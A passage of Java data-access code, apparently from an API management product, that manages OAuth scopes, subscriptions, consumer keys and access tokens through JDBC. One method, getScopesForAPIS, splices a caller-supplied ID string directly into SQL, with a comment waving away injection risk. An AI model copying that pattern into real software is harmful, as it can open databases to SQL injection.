Creation", e1); } handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); APIMgtDBUtil.closeAllConnections(ps2, null, null); } } /** * Check a given scope key already exist for a tenant * * @param scopeKey Scope Key * @param tenantId Tenant ID * @return true if scope already exists * @throws APIManagementException if an error occurs while executing db query */ private boolean isScopeExists(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { if (log.isDebugEnabled()) { log.debug("Scope key " + scopeKey + " for tenant " + tenantId + " exists."); } return true; } } catch (SQLException e) { handleException("Failed to check scope exists for scope " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } public Set<Scope> getAPIScopes(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); int apiId; try { conn = APIMgtDBUtil.getConnection(); apiId = 
getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_API_SCOPES_SQL; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_API_SCOPES_ORACLE_SQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public void addScopes(Connection conn, Set<?> objects, int api_id, int tenantID) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; List<Integer> scopeIds = new ArrayList<Integer>(); String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; try { String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.setString(5, uriTemplate.getScope().getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); uriTemplate.getScope().setId(scopeIdValue); scopeIds.add(scopeIdValue); } } else if (object instanceof Scope) { Scope scope = (Scope) object; ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.setString(5, scope.getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); scope.setId(scopeIdValue); scopeIds.add(scopeIdValue); } } } addScopeLinks(conn, scopeIds, api_id); } } catch (SQLException e) { handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } private void addScopeLinks(Connection connection, List<Integer> scopeIds, int apiId) throws APIManagementException { String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; PreparedStatement ps = null; try { if (scopeIds != null) { ps = connection.prepareStatement(scopeLink); for (Integer scopeId : scopeIds) { ps.setInt(1, apiId); ps.setInt(2, scopeId); ps.addBatch(); } ps.executeBatch(); } } catch (SQLException e) { handleException("Error occurred while creating scope links ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Generate Set<Scope> from HashMap * * @return Set of Scopes populated with roles. 
*/ private Set<Scope> populateScopeSet(HashMap<?, Scope> scopeHashMap) { Set<Scope> scopes = new LinkedHashSet<Scope>(); for (Scope scope : scopeHashMap.values()) { scopes.add(scope); } return scopes; } /** * Returns all the scopes assigned for given apis * * @param apiIdsString list of api ids separated by commas * @return Map<String, Set<Scope>> set of scopes for each apiId * @throws APIManagementException */ public Map<String, Set<Scope>> getScopesForAPIS(String apiIdsString) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; Map<String, Set<Scope>> apiScopeSet = new HashMap<String, Set<Scope>>(); try (Connection conn = APIMgtDBUtil.getConnection()) { String sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST_ORACLE; } // apids are retrieved from the db so no need to protect for sql injection sqlQuery = sqlQuery.replace("$paramList", apiIdsString); ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { String apiId = resultSet.getString(1); Scope scope = new Scope(); scope.setId(resultSet.getInt(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); Set<Scope> scopeList = apiScopeSet.get(apiId); if (scopeList == null) { scopeList = new LinkedHashSet<Scope>(); scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } else { scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } return apiScopeSet; } public Set<Scope> getScopesBySubscribedAPIs(List<APIIdentifier> identifiers) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> apiIds = new ArrayList<Integer>(); HashMap<String, Scope> scopeHashMap = new HashMap<>(); try { conn = APIMgtDBUtil.getConnection(); for (APIIdentifier identifier : identifiers) { apiIds.add(getAPIID(identifier, conn)); } String commaSeparatedIds = StringUtils.join(apiIds.iterator(), ','); String sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_API_PREFIX + commaSeparatedIds + SQLConstants .GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_ORACLE_SQL + commaSeparatedIds + SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; } ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; String scopeKey = resultSet.getString(1); if (scopeHashMap.containsKey(scopeKey)) { // scope already exists append roles. 
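                    // A scope row is returned once per bound role, so the roles are merged into one comma-separated list on the existing entry.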
scope = scopeHashMap.get(scopeKey); String roles = scope.getRoles(); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(scope.getRoles().concat("," + resultSet.getString(4)).trim()); } } else { scope = new Scope(); scope.setKey(scopeKey); scope.setName(resultSet.getString(2)); scope.setDescription(resultSet.getString(3)); String roles = resultSet.getString(4); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(resultSet.getString(4).trim()); } } scopeHashMap.put(scopeKey, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getAPIScopesByScopeKey(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); try { String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEY_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getScopesByScopeKeys(String scopeKeys, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> inputScopeList = Arrays.asList(scopeKeys.split(" ")); StringBuilder placeHolderBuilder = new StringBuilder(); HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); for (int i = 0; i < inputScopeList.size(); i++) { placeHolderBuilder.append("?, "); } String placeHolderStr = placeHolderBuilder.deleteCharAt(placeHolderBuilder.length() - 2).toString(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX + placeHolderStr + SQLConstants .GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX_ORACLE + placeHolderStr + SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; } ps = conn.prepareStatement(sqlQuery); for (int i = 0; i < inputScopeList.size(); i++) { ps.setString(i + 1, inputScopeList.get(i)); } ps.setInt(inputScopeList.size() + 1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. 
                    scope = scopeHashMap.get(scopeId);
                    scope.setRoles(scope.getRoles().concat("," + resultSet.getString(6)).trim());
                } else {
                    scope = new Scope();
                    scope.setId(scopeId);
                    scope.setKey(resultSet.getString(2));
                    scope.setName(resultSet.getString(3));
                    scope.setDescription(resultSet.getString(4));
                    scope.setRoles(resultSet.getString(6).trim());
                }
                scopeHashMap.put(scopeId, scope);
            }
        } catch (SQLException e) {
            handleException("Failed to retrieve api scopes ", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, resultSet);
        }
        return populateScopeSet(scopeHashMap);
    }

    /**
     * Update the scopes defined for an API's URI templates
     *
     * @param api
     * @throws APIManagementException
     */
    public void updateScopes(API api, int tenantId) throws APIManagementException {
        Connection connection = null;
        PreparedStatement prepStmt = null;
        int apiId = -1;
        String deleteResourceScopes = SQLConstants.REMOVE_RESOURCE_SCOPE_SQL;
        String deleteScopes = SQLConstants.REMOVE_SCOPE_SQL;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            apiId = getAPIID(api.getId(), connection);
            if (apiId == -1) {
                // the API record could not be found; nothing to update
                return;
            }
            prepStmt = connection.prepareStatement(deleteResourceScopes);
            prepStmt.setInt(1, apiId);
            prepStmt.execute();
            prepStmt = connection.prepareStatement(deleteScopes);
            prepStmt.setInt(1, apiId);
            prepStmt.execute();
            connection.commit();
        } catch (SQLException e) {
            try {
                if (connection != null) {
                    connection.rollback();
                }
            } catch (SQLException e1) {
                handleException("Error occurred while Rolling back changes done on Scopes updating", e1);
            }
            handleException("Error while updating Scopes for API : " + api.getId(), e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, null);
        }
        addScopes(api.getUriTemplates(), api.getId(), apiId, tenantId);
    }

    public HashMap<String, String> getResourceToScopeMapping(APIIdentifier identifier) throws APIManagementException {
        Connection conn = null;
        ResultSet resultSet = null;
        PreparedStatement ps = null;
        HashMap<String, String> map = new HashMap<String, String>();
        int apiId;
        try {
            String sqlQuery = SQLConstants.GET_RESOURCE_TO_SCOPE_MAPPING_SQL;
            // Obtain the connection before resolving the API ID; getAPIID needs a live connection.
            conn = APIMgtDBUtil.getConnection();
            apiId = getAPIID(identifier, conn);
            ps = conn.prepareStatement(sqlQuery);
            ps.setInt(1, apiId);
            resultSet = ps.executeQuery();
            while (resultSet.next()) {
                map.put(resultSet.getString(1), resultSet.getString(2));
            }
        } catch (SQLException e) {
            handleException("Failed to retrieve api scopes ", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, resultSet);
        }
        return map;
    }

    public Map<String, String> getScopeRolesOfApplication(String consumerKey) throws APIManagementException {
        Connection conn = null;
        ResultSet resultSet = null;
        PreparedStatement ps = null;
        try {
            conn = APIMgtDBUtil.getConnection();
            String sqlQuery = SQLConstants.GET_SCOPE_ROLES_OF_APPLICATION_SQL;
            ps = conn.prepareStatement(sqlQuery);
            ps.setString(1, consumerKey);
            resultSet = ps.executeQuery();
            Map<String, String> scopes = new HashMap<String, String>();
            while (resultSet.next()) {
                if (scopes.containsKey(resultSet.getString(1))) {
                    // Role for the scope exists. Append the new role.
                    String roles = scopes.get(resultSet.getString(1));
                    roles += "," + resultSet.getString(2);
                    scopes.put(resultSet.getString(1), roles);
                } else {
                    scopes.put(resultSet.getString(1), resultSet.getString(2));
                }
            }
            return scopes;
        } catch (SQLException e) {
            handleException("Failed to retrieve scopes of application " + consumerKey, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, resultSet);
        }
        return null;
    }

    /**
     * Remove scope entries from the DB when deleting an API
     *
     * @param apiIdentifier The {@link APIIdentifier} of the API
     */
    private void removeAPIScope(APIIdentifier apiIdentifier) throws APIManagementException {
        Set<Scope> scopes = getAPIScopes(apiIdentifier);
        Connection connection = null;
        PreparedStatement prepStmt = null;
        PreparedStatement deleteOauth2ResourceScopePrepStmt = null;
        PreparedStatement deleteOauth2ScopePrepStmt = null;
        int scopeId;
        int apiId = -1;
        String deleteAPIScopeQuery = SQLConstants.REMOVE_FROM_API_SCOPES_SQL;
        String deleteOauth2ScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_SCOPE_SQL;
        String deleteOauth2ResourceScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_RESOURCE_SQL;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            // Resolve the API ID first; otherwise the AM_API_SCOPES delete below would run against the placeholder -1.
            apiId = getAPIID(apiIdentifier, connection);
            prepStmt = connection.prepareStatement(deleteAPIScopeQuery);
            prepStmt.setInt(1, apiId);
            prepStmt.execute();
            if (!scopes.isEmpty()) {
                deleteOauth2ResourceScopePrepStmt = connection.prepareStatement(deleteOauth2ResourceScopeQuery);
                deleteOauth2ScopePrepStmt = connection.prepareStatement(deleteOauth2ScopeQuery);
                for (Scope scope : scopes) {
                    scopeId = scope.getId();
                    deleteOauth2ResourceScopePrepStmt.setInt(1, scopeId);
                    deleteOauth2ResourceScopePrepStmt.addBatch();
                    deleteOauth2ScopePrepStmt.setInt(1, scopeId);
                    deleteOauth2ScopePrepStmt.addBatch();
                }
                deleteOauth2ResourceScopePrepStmt.executeBatch();
                deleteOauth2ScopePrepStmt.executeBatch();
            }
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while removing the scopes for the API: " + apiIdentifier.getApiName() +
                    " from the database", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(deleteOauth2ResourceScopePrepStmt, null, null);
            APIMgtDBUtil.closeAllConnections(deleteOauth2ScopePrepStmt, null, null);
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, null);
        }
    }

    /**
     * Delete a user subscription based on API_ID, APP_ID, TIER_ID
     *
     * @param apiId - subscriber API ID
     * @param appId - application ID used to subscribe
     * @throws java.sql.SQLException - Letting the caller handle the roll back
     */
    private void deleteSubscriptionByApiIDAndAppID(int apiId, int appId, Connection conn) throws SQLException {
        String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_SQL;
        PreparedStatement ps = null;
        try {
            ps = conn.prepareStatement(deleteQuery);
            ps.setInt(1, apiId);
            ps.setInt(2, appId);
            ps.executeUpdate();
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, null, null);
        }
    }

    /**
     * Delete subscription based on API_PRODUCT_ID, APP_ID
     *
     * @param apiProductId - subscriber API_PRODUCT_ID
     * @param appId - application ID used to subscribe
     * @throws java.sql.SQLException - Letting the caller handle the roll back
     */
    private void deleteSubscriptionByApiProductIDAndAppID(int apiProductId, int appId, Connection conn)
            throws SQLException {
        String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_AND_PRODUCT_SQL;
        PreparedStatement ps = null;
        try {
            ps = conn.prepareStatement(deleteQuery);
            ps.setInt(1, apiProductId);
            ps.setInt(2, appId);
            ps.executeUpdate();
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, null, null);
        }
    }

    /**
     * Check whether the given api name is already
available in the api table under given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if the name is already available * @throws APIManagementException */ public boolean isApiNameExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check api Name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether another API with a different letter case of the given api name is already available in the api * table under the given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if a different letter case name is already available * @throws APIManagementException If failed to check different letter case api name availability */ public boolean isApiNameWithDifferentCaseExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_DIFF_CASE_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_DIFF_CASE_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); prepStmt.setString(3, apiName); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check different letter case api name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public Set<String> getActiveTokensOfConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKEN_OF_CONSUMER_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens for consumerKey " + consumerKey, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of consumerKey " + consumerKey, e); } finally { 
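            // Release the statement, connection and result set whether the lookup succeeded, failed on SQL, or failed on token decryption.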
APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } /** * Check the given scope key is already available under given tenant * * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException */ public boolean isScopeKeyExist(String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String query = SQLConstants.GET_SCOPE_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); int scopeCount = 0; if (resultSet != null) { while (resultSet.next()) { scopeCount = resultSet.getInt("SCOPE_COUNT"); } } if (scopeCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether the given scope key is already assigned to another API than given under given tenant * * @param identifier API Identifier * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException if failed to check the context availability */ public boolean isScopeKeyAssigned(APIIdentifier identifier, String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement prepStmt2 = null; ResultSet resultSet = null; ResultSet resultSet2 = null; String apiScopeQuery = SQLConstants.GET_API_SCOPE_SQL; String getApiQuery = SQLConstants.GET_API_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(apiScopeQuery); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); if (resultSet != null && resultSet.next()) { int apiID = resultSet.getInt("API_ID"); String provider = resultSet.getString("API_PROVIDER"); String apiName = resultSet.getString("API_NAME"); prepStmt2 = connection.prepareStatement(getApiQuery); prepStmt2.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt2.setString(2, identifier.getApiName()); prepStmt2.setString(3, identifier.getVersion()); resultSet2 = prepStmt2.executeQuery(); if (resultSet2 != null && resultSet2.next()) { //If the API ID is different from the one being saved if (apiID != resultSet2.getInt("API_ID")) { //Check if the provider name and api name is same. if (provider.equals(APIUtil.replaceEmailDomainBack(identifier.getProviderName())) && apiName .equals(identifier.getApiName())) { //Return false since this means we're attaching the scope to another version of the API. 
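                        // Reusing a scope key across versions of the same API (same provider and API name) is allowed, so it is not reported as assigned.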
return false; } return true; } else { return false; } } } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt2, null, resultSet2); APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public boolean isDuplicateContextTemplate(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_CONTEXT_TEMPLATE_COUNT_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); if (resultSet.next()) { int count = resultSet.getInt("CTX_COUNT"); return count > 0; } } catch (SQLException e) { handleException("Failed to count contexts which match " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * retrieve list of API names which matches given context * * @param contextTemplate context template * @return list of API names * @throws APIManagementException */ public List<String> getAPINamesMatchingContext(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> nameList = new ArrayList<String>(); String sqlQuery = SQLConstants.GET_API_NAMES_MATCHES_CONTEXT; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); while (resultSet.next()) { nameList.add(resultSet.getString("API_NAME")); } } catch (SQLException e) { handleException("Failed to get API names matches context " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return nameList; } /** * @param consumerKey * @return */ public boolean isMappingExistsforConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_APPLICATION_MAPPING_FOR_CONSUMER_KEY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); // We only expect one result. 
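            // A consumer key maps to at most one application, so the first row (if any) decides the outcome.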
if (resultSet.next()) { String applicationId = resultSet.getString("APPLICATION_ID"); return (applicationId != null && !applicationId.isEmpty()); } } catch (SQLException e) { handleException("Failed to get Application ID by consumerKey ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * @param applicationId * @param keyType * @return */ public String getConsumerkeyByApplicationIdAndKeyType(String applicationId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String consumerKey = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_CONSUMER_KEY_BY_APPLICATION_AND_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { consumerKey = resultSet.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Failed to get consumer key by applicationId " + applicationId + "and keyType " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return consumerKey; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public String getLastPublishedAPIVersionFromAPIStore(APIIdentifier apiIdentifier, String storeName) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Connection conn = null; String version = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_LAST_PUBLISHED_API_VERSION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiIdentifier.getProviderName()); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, storeName); rs = ps.executeQuery(); while (rs.next()) { version = rs.getString("API_VERSION"); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return version; } private String getScopeString(List<String> scopes) { return StringUtils.join(scopes, " "); } /** * Find all active access tokens of a given user. * * @param username - Username of the user * @return - The set of active access tokens of the user. */ public Set<String> getActiveAccessTokensOfUser(String username) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); int tenantId = IdentityTenantUtil.getTenantIdOfUser(username); String userStoreDomain = IdentityUtil.extractDomainFromName(username).toUpperCase(); if (StringUtils.isEmpty(userStoreDomain)) { userStoreDomain = IdentityUtil.getPrimaryDomainName(); } else { //IdentityUtil doesn't have a function to remove the domain name from the username. Using the UserCoreUtil. 
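            // Strip the user store domain prefix here; the domain itself is bound separately (lower-cased) in the token query below.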
username = UserCoreUtil.removeDomainFromName(username); } try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKENS_OF_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACTIVE_TOKENS_OF_USER_SUFFIX; ps = conn.prepareStatement(sqlQuery); ps.setString(1, MultitenantUtils.getTenantAwareUsername(username)); ps.setInt(2, tenantId); ps.setString(3, userStoreDomain.toLowerCase()); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens of user " + username, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of user " + username, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } // public TokenGenerator getTokenGenerator() { // return tokenGenerator; // } private String getAccessTokenStoreTableNameOfUserId(String userId, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromUserId(userId); } return accessTokenStoreTable; } private String getAccessTokenStoreTableFromAccessToken(String accessToken, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); } return accessTokenStoreTable; } /** * This method will fetch all alerts type that is available in AM_ALERT_TYPES. * * @param stakeHolder the name of the stakeholder. whether its "subscriber", "publisher" or * "admin-dashboard" * @return List of alert types * @throws APIManagementException */ public HashMap<Integer, String> getAllAlertTypesByStakeHolder(String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, String> map = new HashMap<Integer, String>(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery; if (stakeHolder.equals("admin-dashboard")) { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES_FOR_ADMIN; ps = conn.prepareStatement(sqlQuery); } else { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES; ps = conn.prepareStatement(sqlQuery); ps.setString(1, stakeHolder); } resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getInt(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve alert types ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } /** * @param userName user name with tenant domain ex: [email protected] * @param stakeHolder value "p" for publisher value "s" for subscriber value "a" for admin * @return map of saved values of alert types. 
